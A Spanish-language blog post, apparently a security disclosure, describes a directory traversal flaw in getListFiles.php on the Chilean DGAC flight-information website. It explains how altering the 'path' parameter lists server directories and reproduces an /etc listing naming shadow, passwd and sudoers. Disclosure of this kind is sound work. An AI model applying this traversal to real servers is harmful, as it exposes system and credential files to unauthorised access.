Vulnerabilidad en sitio web de Internet Flight Information Service (IFIS), de la DGAC.

Una vulnerabilidad del tipo Directory Traversal, que nos permite navegar por los directorios del servidor, fue detectada en el sitio web de Internet Flight Information Service.

aipweb

El sitio web corresponde a http://www.aipchile.gob.cl y mediante el script php getListFiles.php es posible listar el contenido de los distintos directorios del servidor. Dicho script no valida correctamente el valor de la variable path. Originalmente el script se utiliza para revisar el estado de cámaras y se accede desde la URL www.aipchile.gob.cl/getListFiles.php?path=camara/ftp/STA…/Sur, sin embargo, modificando el valor de path podemos subir de nivel y listar directorios hasta llegar a la raíz.

Por ejemplo, listamos el directorio /etc

urlaipEl servidor nos entrega una lista con los directorios y archivos dentro del path especificado.

{«0″:»blkid.tab»,»1177727229″:»gnome-vfs-mime-magic»,»1212128523″:»ucf.conf»,»1235044662″:»logrotate.conf»,»1248534782″:»ltrace.conf»,»1259223815″:»zsh_command_not_found»,»1259856668″:»rpc»,»1259927181″:»lsb-base-logging.sh»,»1264587991″:»deluser.conf»,»1266922272″:»lsb-base»,»1267036005″:»rsyslog.conf»,»1267941508″:»ts.conf»,»1269280607″:»blkid.conf»,»1269434112″:»updatedb.conf»,»1270150122″:»magic»,»1272015944″:»nsswitch.conf»,»1273458206″:»insserv.conf»,»1273468975″:»libpaper.d»,»1273476856″:»nanorc»,»1274008728″:»mtools.conf»,»1275300352″:»inputrc»,»1275427270″:»mime.types»,»1276563336″:»hdparm.conf»,»1276598129″:»rmt»,»1276895632″:»screenrc»,»1277667522″:»at.deny»,»1281023834″:»locale.alias»,»1281137953″:»bash_completion»,»1281473254″:»bash.bashrc»,»1282013258″:»pam.conf»,»1282070974″:»manpath.config»,»1282157177″:»mke2fs.conf»,»1282682757″:»crontab»,»1283510657″:»login.defs»,»1283528208″:»wgetrc»,»1284138108″:»bindresvport.blacklist»,»1284138111″:»gai.conf»,»1285579308″:»fuse.conf»,»1285621446″:»debconf.conf»,»1286441275″:»lsb-release»,»1286442911″:»issue»,»1301080886″:»ftpusers»,»1305800435″:»iscsi»,»1305815208″:»hosts»,»1305815757″:»kernel»,»1305815762″:»opt»,»1305815778″:»terminfo»,»1305815783″:»environment»,»1305815784″:»python2.6″,»1305815785″:»adduser.conf»,»1305815786″:»depmod.d»,»1305815793″:»logcheck»,»1305815796″:»iproute2″,»1305815798″:»cron.monthly»,»1305815799″:»vim»,»1305815801″:»kbd»,»1305815803″:»console-setup»,»1305815814″:»lvm»,»1305818597″:»perl»,»1305818985″:»fonts»,»1305820063″:»ca-certificates»,»1305820068″:»apm»,»1305820081″:»ca-certificates.conf»,»1305820084″:»calendar»,»1305820085″:»groff»,»1305820086″:»cron.weekly»,»1305820092″:»chatscripts»,»1305820093″:»ufw»,»1305820094″:»hosts.allow»,»1305820191″:»pm»,»1305820192″:»grub.d»,»1305820807″:»kernel-img.conf»,»1305820809″:»sudoers»,»1305821060″:»security»,»1305821115″:»apparmor.d»,»1305821116″:»profile.d»,»1305821117″:»ldap»,»1305821118″:»w3m»,»1305821119″:»apparmor»,»1305821154″:»gamin»,»1305826049″:»cron.daily»,»1305830611″:»php5″,»1305831014″:»ConsoleKit»,»1305831015″:»xdg»,»1305831021″:»polkit-1″,»1305831026″:»gnome-vfs-2.0″,»1305831033″:»dbus-1″,»1305831037″:»pango»,»1305831038″:»papersize»,»1305831039″:»bonobo-activation»,»1305831040″:»obex-data-server»,»1305831083″:»gconf»,»1306764052″:»rc1.d»,»1309792793″:»pear»,»1309793244″:»dpkg»,»1309793719″:»mailcap»,»1309793913″:»ld.so.conf»,»1309795739″:»group-«,»1309795986″:»vsftpd.conf»,»1309797705″:»network»,»1309957244″:»shadow-«,»1328537093″:»updatedb.conf.old.0″,»1333139132″:»updatedb.conf.old.1″,»1339084724″:»ghostscript»,»1346938354″:»lighttpd»,»1346938799″:»cron.d»,»1346938926″:»awstats»,»1358621945″:»resolv.conf»,»1361544879″:»vga»,»1368804766″:»rsyslog.d»,»1378993840″:»apt»,»1383609049″:»ssh»,»1392404976″:»passwd»,»1392404977″:»gshadow»,»1392404990″:»shadow»,»1392406451″:»sysctl.d»,»1392406987″:»sysctl.conf»,»1410442776″:»gdm»,»1410442777″:»defoma»,»1410442781″:»pulse»,»1410442782″:»gtk-2.0″,»1410442783″:»default»,»1410873222″:»byobu»,»1415108000″:»mtab»,»1415369852″:»rc.local»,»1415989185″:»apache2″,»1422977578″:»mysql»,»1423764549″:»postgresql-common»,»1423764603″:»alternatives»,»1426602600″:»localtime»,»1426683143″:»rc0.d»,»1426683146″:»updatedb.conf.old.2″,»1426683159″:»fstab»,»1426683162″:»init»,»1426683164″:»pam.d»,»1426683166″:»ld.so.conf.d»,»1426683178″:»vmware-tools»,»1429188903″:»motd»}

Se intentó reportar la vulnerabilidad hace más de 1 mes sin ningun tipo de respuesta.

La vulnerabilidad ha sido catalogada con el ID #2616.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.